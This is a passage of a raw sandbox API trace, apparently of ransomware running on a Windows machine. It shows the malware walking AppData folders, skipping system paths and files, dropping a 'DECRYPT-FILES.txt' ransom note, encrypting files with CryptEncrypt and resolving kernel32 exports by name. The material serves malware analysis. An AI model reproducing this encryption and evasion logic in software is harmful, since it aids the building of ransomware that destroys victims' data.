ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.474] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.474] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.474] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.474] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.474] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaf80ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.474] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.474] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaf80ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.474] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.474] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.474] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.474] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.474] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.474] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.474] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.474] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.474] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.474] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.474] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.475] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.475] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.475] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.475] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.475] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 66 [0078.475] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.475] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\" [0078.475] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\jkbimi8.tmp" [0078.475] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.475] CloseHandle (hObject=0x0) returned 0 [0078.475] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.475] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaf80ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.475] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.476] CloseHandle (hObject=0x448) returned 1 [0078.476] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbec39d0, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0xbec39d0, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher Building Blocks", cAlternateFileName="PUBLIS~2")) returned 1 [0078.476] lstrcmpW (lpString1="Publisher Building Blocks", lpString2=".") returned 1 [0078.476] lstrcmpW (lpString1="Publisher Building Blocks", lpString2="..") returned 1 [0078.476] lstrcatW (in: lpString1="Publisher Building Blocks", lpString2="\\" | out: lpString1="Publisher Building Blocks\\") returned="Publisher Building Blocks\\" [0078.476] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Publisher Building Blocks\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\Program Files") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch=":\\Windows") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\Games\\") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\All Users") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="AhnLab") returned 0x0 [0078.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.476] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0078.476] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.476] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\jkbimi8.tmp") returned 94 [0078.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.478] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0078.478] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.478] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\DECRYPT-FILES.txt") returned 100 [0078.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.480] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.481] CloseHandle (hObject=0x44c) returned 1 [0078.481] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0078.481] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*" [0078.481] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.482] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.482] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.482] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.482] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.482] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4bb4c1b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbec39d0, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ContentStore.xml", cAlternateFileName="CONTEN~1.XML")) returned 1 [0078.482] lstrcmpiW (lpString1="ContentStore.xml", lpString2="DECRYPT-FILES.txt") returned -1 [0078.482] lstrcmpiW (lpString1="ContentStore.xml", lpString2="autorun.inf") returned 1 [0078.482] lstrcmpiW (lpString1="ContentStore.xml", lpString2="boot.ini") returned 1 [0078.482] lstrcmpiW (lpString1="ContentStore.xml", lpString2="desktop.ini") returned -1 [0078.482] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ntuser.dat") returned -1 [0078.482] lstrcmpiW (lpString1="ContentStore.xml", lpString2="iconcache.db") returned -1 [0078.482] lstrcmpiW (lpString1="ContentStore.xml", lpString2="bootsect.bak") returned 1 [0078.482] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ntuser.dat.log") returned -1 [0078.482] lstrcmpiW (lpString1="ContentStore.xml", lpString2="thumbs.db") returned -1 [0078.482] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Bootfont.bin") returned 1 [0078.482] lstrlenW (lpString="ContentStore.xml") returned 16 [0078.482] lstrcmpiW (lpString1="xml", lpString2="lnk") returned 1 [0078.482] lstrcmpiW (lpString1="xml", lpString2="exe") returned 1 [0078.482] lstrcmpiW (lpString1="xml", lpString2="sys") returned 1 [0078.482] lstrcmpiW (lpString1="xml", lpString2="dll") returned 1 [0078.482] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0078.482] lstrlenW (lpString="ContentStore.xml") returned 16 [0078.482] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0078.482] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="ContentStore.xml" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" [0078.482] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0078.484] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=168) returned 1 [0078.484] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0078.484] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.484] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.484] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.484] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.485] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0078.486] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.486] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.486] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.486] CloseHandle (hObject=0x454) returned 1 [0078.486] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.487] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0078.487] CloseHandle (hObject=0x0) returned 0 [0078.487] CloseHandle (hObject=0x450) returned 1 [0078.488] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.488] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.489] GetTickCount () returned 0x114c1e9 [0078.489] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.489] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.489] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.489] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.489] lstrlenA (lpString="kernel32.dll") returned 12 [0078.490] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.490] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.490] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.490] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.490] lstrlenA (lpString="ADDATOMA") returned 8 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.490] lstrlenA (lpString="ADDATOMW") returned 8 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.490] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.490] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.490] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.490] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.490] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.490] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.490] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.490] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.490] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.490] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.490] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.491] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.491] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.491] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.491] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.491] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.491] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.491] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.491] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.491] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.491] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.491] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.491] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.491] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.491] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.491] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") 